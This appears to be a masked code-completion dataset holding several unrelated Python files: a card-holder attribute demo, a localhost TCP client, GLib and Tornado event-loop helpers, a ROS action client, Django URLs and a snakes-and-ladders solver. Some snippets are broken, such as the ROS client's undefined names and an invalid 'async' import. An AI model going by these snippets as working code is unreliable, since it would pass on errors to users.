"step-4": "class CardHolder:\n acctlen = 8\n retireage = 59.5\n\n def __init__(self, acct, name, age, addr):\n self.acct = acct\n self.name = name\n self.age = age\n self.addr = addr\n\n def __getattribute__(self, item):\n superget = object.__getattribute__\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\nif __name__ == '__main__':\n bob = CardHolder('1234-5678', 'Bob Smith', 40, '123 main st')\n print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')\n bob.name = 'Bob Q. Smith'\n bob.age = 50\n bob.acct = '23-45-67-89'\n print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')\n sue = CardHolder('5678-12-34', 'Sue Jones', 35, '124 main st')\n print(sue.acct, sue.name, sue.remain, sue.addr, sep=' / ')\n try:\n sue.age = 200\n except Exception:\n print('Bad age for Sue')\n try:\n sue.remain = 5\n except Exception:\n print(\"Can't set sue.remain\")\n try:\n sue.acct = '1234567'\n except Exception:\n print('Bad acct for Sue')\n",
"step-5": "class CardHolder:\n acctlen = 8\n retireage = 59.5\n\n def __init__(self, acct, name, age, addr):\n self.acct = acct\n self.name = name\n self.age = age\n self.addr = addr\n\n def __getattribute__(self, item): # __getattribute__ intercepts calls for all\n # attributes (defined and undefined)\n\n superget = object.__getattribute__ # We have to use __getattribute__ of object\n # class (superclass) to prevent looping\n if item == 'acct':\n return superget(self, 'acct')[:-3] + '***'\n elif item == 'remain':\n return superget(self, 'retireage') - superget(self, 'age')\n else:\n return superget(self, item)\n\n def __setattr__(self, key, value):\n if key == 'name':\n value = value.lower().replace(' ', '_')\n elif key == 'age':\n if value < 0 or value > 130:\n raise ValueError('invalid age')\n elif key == 'acct':\n value = value.replace('-', '')\n if len(value) != self.acctlen:\n raise TypeError('invalid acct number')\n elif key == 'remain':\n raise TypeError('cannot set remain')\n self.__dict__[key] = value\n\n\nif __name__ == '__main__':\n bob = CardHolder('1234-5678', 'Bob Smith', 40, '123 main st')\n print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')\n bob.name = 'Bob Q. Smith'\n bob.age = 50\n bob.acct = '23-45-67-89'\n print(bob.acct, bob.name, bob.remain, bob.addr, sep=' / ')\n\n sue = CardHolder('5678-12-34', 'Sue Jones', 35, '124 main st')\n print(sue.acct, sue.name, sue.remain, sue.addr, sep=' / ')\n\n try:\n sue.age = 200\n except Exception:\n print('Bad age for Sue')\n\n try:\n sue.remain = 5\n except Exception:\n print(\"Can't set sue.remain\")\n\n try:\n sue.acct = '1234567'\n except Exception:\n print('Bad acct for Sue')\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import socket
def main():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('localhost', 8886)
sock.connect(server_address)
data = "TCP"
length = len(data)
ret = bytearray([])
for byte in data.encode("utf-8"):
ret.append(byte)
sock.sendall(ret)
if __name__ == '__main__':
main()
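
# A minimal companion server sketch for trying out main() above from a second
# process; it shows the other end of the localhost:8886 exchange. The name
# serve_once and the 1024-byte read size are illustrative additions, not part
# of the original client, and it assumes nothing else is bound to that port.
def serve_once(host='localhost', port=8886):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, port))
    server.listen(1)
    conn, addr = server.accept()
    try:
        chunk = conn.recv(1024)  # the client sends the raw UTF-8 bytes of "TCP"
        print(addr, chunk.decode('utf-8'))
    finally:
        conn.close()
        server.close()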
|
normal
|
{
"blob_id": "c6fd848bb3d845a50b928c18a51f296a500e7746",
"index": 2922,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = 'localhost', 8886\n sock.connect(server_address)\n data = 'TCP'\n length = len(data)\n ret = bytearray([])\n for byte in data.encode('utf-8'):\n ret.append(byte)\n sock.sendall(ret)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = 'localhost', 8886\n sock.connect(server_address)\n data = 'TCP'\n length = len(data)\n ret = bytearray([])\n for byte in data.encode('utf-8'):\n ret.append(byte)\n sock.sendall(ret)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import socket\n\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = 'localhost', 8886\n sock.connect(server_address)\n data = 'TCP'\n length = len(data)\n ret = bytearray([])\n for byte in data.encode('utf-8'):\n ret.append(byte)\n sock.sendall(ret)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import socket\n\ndef main():\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n server_address = ('localhost', 8886)\n sock.connect(server_address)\n\n data = \"TCP\"\n length = len(data)\n ret = bytearray([])\n for byte in data.encode(\"utf-8\"):\n ret.append(byte)\n sock.sendall(ret)\n\nif __name__ == '__main__':\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# -*- coding: utf-8 -*-
import time
import errno
from gi.repository import GLib
from ..async import (FutureSourcePair, FutureCanceled, SucceededFuture,
BrokenPipeError, ConnectionError)
__all__ = ('GCore',)
#------------------------------------------------------------------------------#
# GLib Core #
#------------------------------------------------------------------------------#
class GCore (object):
def __init__ (self, context = None):
self.sources = set ()
#--------------------------------------------------------------------------#
# Time #
#--------------------------------------------------------------------------#
def Time (self, resume, cancel = None):
return self.TimeDelay (resume - time.time (), cancel)
def TimeDelay (self, delay, cancel = None):
resume = time.time () + delay
if delay < 0:
return SucceededFuture (resume)
return self.source_create (lambda source: source.TrySetResult (resume),
cancel, GLib.timeout_add, (int (delay * 1000),))
#--------------------------------------------------------------------------#
# Idle #
#--------------------------------------------------------------------------#
def Idle (self, cancel = None):
return self.source_create (lambda source: source.TrySetResult (None), cancel, GLib.idle_add)
#--------------------------------------------------------------------------#
# Poll #
#--------------------------------------------------------------------------#
READ = GLib.IO_IN
WRITE = GLib.IO_OUT
URGENT = GLib.IO_PRI
DISCONNECT = GLib.IO_HUP
ERROR = GLib.IO_ERR | GLib.IO_NVAL | GLib.IO_HUP
def Poll (self, fd, mask, cancel = None):
if mask is None:
return # no clean up for closed file descriptors
def resolve (source, fd, cond):
if cond & ~self.ERROR:
source.TrySetResult (cond)
else:
source.TrySetException (BrokenPipeError (errno.EPIPE, 'Broken pipe')
if cond & self.DISCONNECT else ConnectionError ())
return self.source_create (resolve, cancel, GLib.io_add_watch, (fd, mask | self.ERROR))
#--------------------------------------------------------------------------#
# Execute #
#--------------------------------------------------------------------------#
def __call__ (self): return self.Execute ()
def Execute (self):
try:
for none in self.Iterator ():
if not self.sources:
return
finally:
self.Dispose ()
#--------------------------------------------------------------------------#
# Iterator #
#--------------------------------------------------------------------------#
def __iter__ (self): return self.Iterator ()
def Iterator (self, block = True):
context = GLib.main_context_default ()
while True:
context.iteration (block)
yield
#--------------------------------------------------------------------------#
# Private #
#--------------------------------------------------------------------------#
def source_create (self, resolve, cancel, enqueue, args = None):
"""Create and enqueue future
enqueue (*args, resolve) -> source_id
resolve (source, *resolve_args) -> None
"""
future, source = FutureSourcePair ()
def resolve_internal (*resolve_args):
self.sources.discard (source)
resolve (source, *resolve_args)
return False # remove from event loop
if cancel:
def cancel_cont (result, error):
GLib.source_remove (source_id)
self.sources.discard (source)
source.TrySetCanceled ()
cancel.Await ().OnCompleted (cancel_cont)
source_id = enqueue (*(args + (resolve_internal,))) if args else enqueue (resolve_internal)
self.sources.add (source)
return future
#--------------------------------------------------------------------------#
# Disposable #
#--------------------------------------------------------------------------#
def Dispose (self, error = None):
error = error or FutureCanceled ('Core has been stopped')
# resolve futures
sources, self.sources = self.sources, set ()
for source in list (sources):
source.TrySetException (error)
def __enter__ (self):
return self
def __exit__ (self, et, eo, tb):
self.Dispose (eo)
return False
# vim: nu ft=python columns=120 :
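
# A minimal, commented-out usage sketch of how the pieces above fit together.
# It is an assumption that the futures returned here expose the same
# Await ().OnCompleted (continuation) style that source_create () wires up for
# its cancel futures; the (result, error) signature mirrors cancel_cont above.
#
# with GCore () as core:
#     done = core.TimeDelay (1.0)
#     done.Await ().OnCompleted (lambda result, error: print ('resumed at', result))
#     core.Execute ()                    # runs until no pending sources remain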
|
normal
|
{
"blob_id": "4d43e470144a6284d85902b495dc19dc150eb681",
"index": 4000,
"step-1": "# -*- coding: utf-8 -*-\nimport time\nimport errno\nfrom gi.repository import GLib\n\nfrom ..async import (FutureSourcePair, FutureCanceled, SucceededFuture,\n BrokenPipeError, ConnectionError)\n\n__all__ = ('GCore',)\n#------------------------------------------------------------------------------#\n# GLib Core #\n#------------------------------------------------------------------------------#\nclass GCore (object):\n def __init__ (self, context = None):\n self.sources = set ()\n\n #--------------------------------------------------------------------------#\n # Time #\n #--------------------------------------------------------------------------#\n def Time (self, resume, cancel = None):\n return self.TimeDelay (resume - time.time (), cancel)\n\n def TimeDelay (self, delay, cancel = None):\n resume = time.time () + delay\n if delay < 0:\n return SucceededFuture (resume)\n\n return self.source_create (lambda source: source.TrySetResult (resume),\n cancel, GLib.timeout_add, (int (delay * 1000),))\n\n #--------------------------------------------------------------------------#\n # Idle #\n #--------------------------------------------------------------------------#\n def Idle (self, cancel = None):\n return self.source_create (lambda source: source.TrySetResult (None), cancel, GLib.idle_add)\n\n #--------------------------------------------------------------------------#\n # Poll #\n #--------------------------------------------------------------------------#\n READ = GLib.IO_IN\n WRITE = GLib.IO_OUT\n URGENT = GLib.IO_PRI\n DISCONNECT = GLib.IO_HUP\n ERROR = GLib.IO_ERR | GLib.IO_NVAL | GLib.IO_HUP\n\n def Poll (self, fd, mask, cancel = None):\n if mask is None:\n return # no clean up for closed file descriptors\n\n def resolve (source, fd, cond):\n if cond & ~self.ERROR:\n source.TrySetResult (cond)\n else:\n source.TrySetException (BrokenPipeError (errno.EPIPE, 'Broken pipe')\n if cond & self.DISCONNECT else ConnectionError ())\n\n return self.source_create (resolve, cancel, GLib.io_add_watch, (fd, mask | self.ERROR))\n\n #--------------------------------------------------------------------------#\n # Execute #\n #--------------------------------------------------------------------------#\n def __call__ (self): return self.Execute ()\n def Execute (self):\n try:\n for none in self.Iterator ():\n if not self.sources:\n return\n finally:\n self.Dispose ()\n\n #--------------------------------------------------------------------------#\n # Iterator #\n #--------------------------------------------------------------------------#\n def __iter__ (self): return self.Iterator ()\n def Iterator (self, block = True):\n context = GLib.main_context_default ()\n while True:\n context.iteration (block)\n yield\n\n #--------------------------------------------------------------------------#\n # Private #\n #--------------------------------------------------------------------------#\n def source_create (self, resolve, cancel, enqueue, args = None):\n \"\"\"Create and enqueue future\n\n enqueue (*args, resolve) -> source_id\n resolve (source, *resolve_args) -> None\n \"\"\"\n future, source = FutureSourcePair ()\n\n def resolve_internal (*resolve_args):\n self.sources.discard (source)\n resolve (source, *resolve_args)\n return False # remove from event loop\n\n if cancel:\n def cancel_cont (result, error):\n GLib.source_remove (source_id)\n self.sources.discard (source)\n source.TrySetCanceled ()\n cancel.Await ().OnCompleted (cancel_cont)\n\n source_id = enqueue (*(args + (resolve_internal,))) 
if args else enqueue (resolve_internal)\n self.sources.add (source)\n\n return future\n\n #--------------------------------------------------------------------------#\n # Disposable #\n #--------------------------------------------------------------------------#\n def Dispose (self, error = None):\n error = error or FutureCanceled ('Core has been stopped')\n\n # resolve futures\n sources, self.sources = self.sources, set ()\n for source in list (sources):\n source.TrySetException (error)\n\n def __enter__ (self):\n return self\n\n def __exit__ (self, et, eo, tb):\n self.Dispose (eo)\n return False\n\n# vim: nu ft=python columns=120 :\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
"""Class for better periodic call handling"""
import tornado
import tornado.gen
import logging
class YieldPeriodicCallback(object):
"""Class for better periodic call"""
def __init__(self, callback, callback_time, io_loop=None, faststart=False):
"""Init method it can be used like tornado periodic callback, but it has
extra paramtetr
:param faststart: if true callback will be run after application start
"""
self.callback = callback
if callback_time <= 0:
raise ValueError("Periodic callback must have a positive callback_time")
self.callback_time = callback_time
self.io_loop = io_loop or tornado.ioloop.IOLoop.current()
self._running = False
self._timeout = None
if faststart:
self._running = True
self._next_timeout = self.io_loop.time()
self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)
def start(self):
"""Starts the timer"""
if self._running:
return
self._running = True
self._next_timeout = self.io_loop.time()
self._schedule_next()
def stop(self):
"""Stops the timer"""
self._running = False
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = None
@tornado.gen.coroutine
def _run(self):
"""Run the run method and schedule next time"""
if not self._running:
return
try:
yield self.callback()
except Exception: # pylint: disable=W0703
logging.error("Error in periodic callback", exc_info=True)
self._schedule_next()
def _schedule_next(self):
"""Schedule next callback method"""
if self._running:
current_time = self.io_loop.time()
while self._next_timeout <= current_time:
self._next_timeout += self.callback_time / 1000.0
self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)
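
# A minimal, commented-out usage sketch, assuming a Tornado process that owns
# the IOLoop; the coroutine name poll_backend and the 5000 ms interval are
# illustrative, not taken from this module.
#
# @tornado.gen.coroutine
# def poll_backend():
#     pass  # any yielding work goes here
#
# periodic = YieldPeriodicCallback(poll_backend, 5000, faststart=True)
# periodic.start()
# tornado.ioloop.IOLoop.current().start()   # periodic.stop() cancels the timer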
|
normal
|
{
"blob_id": "7726f8cc9adf15823cccdaa4ba316800bb134460",
"index": 1920,
"step-1": "<mask token>\n\n\nclass YieldPeriodicCallback(object):\n <mask token>\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\n 'Periodic callback must have a positive callback_time')\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n <mask token>\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n",
"step-2": "<mask token>\n\n\nclass YieldPeriodicCallback(object):\n <mask token>\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\n 'Periodic callback must have a positive callback_time')\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n\n @tornado.gen.coroutine\n def _run(self):\n \"\"\"Run the run method and schedule next time\"\"\"\n if not self._running:\n return\n try:\n yield self.callback()\n except Exception:\n logging.error('Error in periodic callback', exc_info=True)\n self._schedule_next()\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n",
"step-3": "<mask token>\n\n\nclass YieldPeriodicCallback(object):\n \"\"\"Class for better periodic call\"\"\"\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\n 'Periodic callback must have a positive callback_time')\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n\n @tornado.gen.coroutine\n def _run(self):\n \"\"\"Run the run method and schedule next time\"\"\"\n if not self._running:\n return\n try:\n yield self.callback()\n except Exception:\n logging.error('Error in periodic callback', exc_info=True)\n self._schedule_next()\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n",
"step-4": "<mask token>\nimport tornado\nimport tornado.gen\nimport logging\n\n\nclass YieldPeriodicCallback(object):\n \"\"\"Class for better periodic call\"\"\"\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\n 'Periodic callback must have a positive callback_time')\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n\n @tornado.gen.coroutine\n def _run(self):\n \"\"\"Run the run method and schedule next time\"\"\"\n if not self._running:\n return\n try:\n yield self.callback()\n except Exception:\n logging.error('Error in periodic callback', exc_info=True)\n self._schedule_next()\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout,\n self._run)\n",
"step-5": "\"\"\"Class for better periodic call handling\"\"\"\nimport tornado\nimport tornado.gen\nimport logging\n\nclass YieldPeriodicCallback(object):\n \"\"\"Class for better periodic call\"\"\"\n\n def __init__(self, callback, callback_time, io_loop=None, faststart=False):\n \"\"\"Init method it can be used like tornado periodic callback, but it has\n extra paramtetr\n :param faststart: if true callback will be run after application start\n \"\"\"\n self.callback = callback\n if callback_time <= 0:\n raise ValueError(\"Periodic callback must have a positive callback_time\")\n self.callback_time = callback_time\n self.io_loop = io_loop or tornado.ioloop.IOLoop.current()\n self._running = False\n self._timeout = None\n\n if faststart:\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)\n\n def start(self):\n \"\"\"Starts the timer\"\"\"\n if self._running:\n return\n self._running = True\n self._next_timeout = self.io_loop.time()\n self._schedule_next()\n\n def stop(self):\n \"\"\"Stops the timer\"\"\"\n self._running = False\n if self._timeout is not None:\n self.io_loop.remove_timeout(self._timeout)\n self._timeout = None\n\n @tornado.gen.coroutine\n def _run(self):\n \"\"\"Run the run method and schedule next time\"\"\"\n if not self._running:\n return\n try:\n yield self.callback()\n except Exception: # pylint: disable=W0703\n logging.error(\"Error in periodic callback\", exc_info=True)\n self._schedule_next()\n\n def _schedule_next(self):\n \"\"\"Schedule next callback method\"\"\"\n if self._running:\n current_time = self.io_loop.time()\n while self._next_timeout <= current_time:\n self._next_timeout += self.callback_time / 1000.0\n self._timeout = self.io_loop.add_timeout(self._next_timeout, self._run)\n\n\n\n",
"step-ids": [
5,
6,
7,
8,
9
]
}
|
[
5,
6,
7,
8,
9
] |
#! /usr/bin/env python
import roslib
roslib.load_manifest('learning_tf')
import rospy
import actionlib
from geometry_msgs.msg import Twist
from turtlesim.msg import Pose
from goal.msg import moveAction, moveGoal
if __name__ == '__main__':
rospy.init_node('move_client')
    client = actionlib.SimpleActionClient('moveTo', moveAction)  # action type from goal.msg imported above
client.wait_for_server()
    goal = moveGoal()
# Fill in the goal here
client.send_goal(goal)
client.wait_for_result(rospy.Duration.from_sec(5.0))
|
normal
|
{
"blob_id": "791935f63f7a0ab2755ad33369d2afa8c10dffbb",
"index": 4708,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nroslib.load_manifest('learning_tf')\n<mask token>\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n goal = DoDishesGoal()\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))\n",
"step-3": "import roslib\nroslib.load_manifest('learning_tf')\nimport rospy\nimport actionlib\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\nfrom goal.msg import moveAction, moveGoal\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n goal = DoDishesGoal()\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))\n",
"step-4": "#! /usr/bin/env python\nimport roslib\nroslib.load_manifest('learning_tf')\n\nimport rospy\nimport actionlib\nfrom geometry_msgs.msg import Twist\nfrom turtlesim.msg import Pose\n\nfrom goal.msg import moveAction, moveGoal\n\nif __name__ == '__main__':\n rospy.init_node('move_client')\n client = actionlib.SimpleActionClient('moveTo', turtlesim_)\n client.wait_for_server()\n\n goal = DoDishesGoal()\n # Fill in the goal here\n client.send_goal(goal)\n client.wait_for_result(rospy.Duration.from_sec(5.0))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#this apps is open
#Let's start with introduction
print "Hi, I am x0x. Could we introduce ourselves? (yes/no)"
answer = raw_input()
if answer.lower() == 'yes':
print "Okay, what is your name?"
name = raw_input()
print "Hi", name
print "Nice to meet you."
print "What are you going to do?"
print '1. Say "good bye"'
print '2. Say "Thank you"'
answer = raw_input()
if answer == '1':
print 'Well, good bye', name
elif answer == '2':
print 'Sakalangkong', name
else:
print 'You choose wrong answer, I am terminated.'
print 'bye'
elif answer.lower() == 'no':
print "thank you"
else:
print "your answer is wrong"
print "Please come back later. Thank you!"
print "yoyoi oke"
|
normal
|
{
"blob_id": "a28c62a18d793fb285353902d01801c720bcb454",
"index": 1653,
"step-1": "#this apps is open\n\n#Let's start with introduction\n\nprint \"Hi, I am x0x. Could we introduce ourselves? (yes/no)\"\nanswer = raw_input()\nif answer.lower() == 'yes':\n print \"Okay, what is your name?\"\n name = raw_input()\n print \"Hi\", name\n print \"Nice to meet you.\"\n print \"What are you going to do?\"\n print '1. Say \"good bye\"'\n print '2. Say \"Thank you\"'\n answer = raw_input()\n if answer == '1':\n print 'Well, good bye', name\n elif answer == '2':\n print 'Sakalangkong', name\n else:\n print 'You choose wrong answer, I am terminated.'\n print 'bye'\nelif answer.lower() == 'no':\n print \"thank you\"\nelse:\n print \"your answer is wrong\"\n print \"Please come back later. Thank you!\"\n print \"yoyoi oke\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.contrib import admin
from django.urls import path
from . import views
urlpatterns = [
path('', views.artifact, name="artifacts"),
path('<int:artifact_id>', views.detail, name="detail"),
path('register/', views.register, name="register")
]
|
normal
|
{
"blob_id": "9b73037e8af7d4f91261cebf895b68650182fcd5",
"index": 2780,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [path('', views.artifact, name='artifacts'), path(\n '<int:artifact_id>', views.detail, name='detail'), path('register/',\n views.register, name='register')]\n",
"step-3": "from django.contrib import admin\nfrom django.urls import path\nfrom . import views\nurlpatterns = [path('', views.artifact, name='artifacts'), path(\n '<int:artifact_id>', views.detail, name='detail'), path('register/',\n views.register, name='register')]\n",
"step-4": "from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.artifact, name=\"artifacts\"),\n path('<int:artifact_id>', views.detail, name=\"detail\"),\n path('register/', views.register, name=\"register\")\n]",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#
# @lc app=leetcode.cn id=909 lang=python3
#
# [909] 蛇梯棋
#
# @lc code=start
from typing import List
class Solution:
def snakesAndLadders(self, board: List[List[int]]) -> int:
N = len(board)
def get_pos(num):
r = (num-1) // N
c = (num-1) % N
c = c if ((r+1) & 1) else (N-1 - c)
r = N-1 - r
return r, c
# r, c = get_pos(20)
# print(r, c)
def skip(num):
r, c = get_pos(num)
if board[r][c] != -1:
return board[r][c]
else:
return num
from collections import deque
dq = deque([1])
vis = set([1])
step = -1
while dq:
sz = len(dq)
step += 1
for _ in range(sz):
node = dq.popleft()
if (node == N*N):
return step
for i in range(1, 7):
new_node = node + i
if (new_node > N*N):
continue
new_node = skip(new_node)
if (new_node not in vis):
dq.append(new_node)
vis.add(new_node)
return -1
""" 21-06-27 每日一题打卡BFS
Accepted
211/211 cases passed (100 ms)
Your runtime beats 99.08 % of python3 submissions
Your memory usage beats 14.68 % of python3 submissions (15.1 MB)
"""
# board = [[-1,-1,-1,-1,-1,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,35,-1,-1,13,-1],
# [-1,-1,-1,-1,-1,-1],
# [-1,15,-1,-1,-1,-1]]
# s = Solution().snakesAndLadders(board)
# print(s)
# @lc code=end
|
normal
|
{
"blob_id": "da5a366d1cc4f192a220dc38c7a74aeb3fba7cdb",
"index": 9839,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def snakesAndLadders(self, board: List[List[int]]) ->int:\n N = len(board)\n\n def get_pos(num):\n r = (num - 1) // N\n c = (num - 1) % N\n c = c if r + 1 & 1 else N - 1 - c\n r = N - 1 - r\n return r, c\n\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if node == N * N:\n return step\n for i in range(1, 7):\n new_node = node + i\n if new_node > N * N:\n continue\n new_node = skip(new_node)\n if new_node not in vis:\n dq.append(new_node)\n vis.add(new_node)\n return -1\n\n\n<mask token>\n",
"step-4": "from typing import List\n\n\nclass Solution:\n\n def snakesAndLadders(self, board: List[List[int]]) ->int:\n N = len(board)\n\n def get_pos(num):\n r = (num - 1) // N\n c = (num - 1) % N\n c = c if r + 1 & 1 else N - 1 - c\n r = N - 1 - r\n return r, c\n\n def skip(num):\n r, c = get_pos(num)\n if board[r][c] != -1:\n return board[r][c]\n else:\n return num\n from collections import deque\n dq = deque([1])\n vis = set([1])\n step = -1\n while dq:\n sz = len(dq)\n step += 1\n for _ in range(sz):\n node = dq.popleft()\n if node == N * N:\n return step\n for i in range(1, 7):\n new_node = node + i\n if new_node > N * N:\n continue\n new_node = skip(new_node)\n if new_node not in vis:\n dq.append(new_node)\n vis.add(new_node)\n return -1\n\n\n<mask token>\n",
